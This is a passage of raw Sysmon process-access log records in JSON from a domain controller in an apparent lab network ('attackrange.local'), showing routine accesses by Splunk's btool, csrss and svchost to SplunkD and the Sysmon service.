Files\\SplunkUniversalForwarder\\bin\\btool.exe+2568|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+2926|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+11cf|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+1245|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+aa24|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:50.512","SourceProcessGUID":"{E2A3D6B1-1106-5F25-0000-0010E2A60500}","SourceProcessId":"4932","SourceThreadId":"4936","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","TargetProcessGUID":"{E2A3D6B1-1106-5F25-0000-00109DA70500}","TargetProcessId":"4968","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+239c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+2568|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+2926|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+11cf|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+1245|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+aa24|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:50","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3858,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:50.512\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 660\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1106-5F25-0000-00109DA70500}\r\nTargetProcessId: 4968\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:50.512","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"660","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1106-5F25-0000-00109DA70500}","TargetProcessId":"4968","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:51:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:50","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3859,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:50.512\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:50.512","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:50","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3860,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:50.512\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:50.512","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:50","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3861,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:50.512\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:50.512","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:50","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3862,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:50.512\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:50.512","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:50","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3863,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:50.512\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:50.512","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:50","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3864,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:50.512\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:50.512","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:50","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3865,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:50.512\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:50.512","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 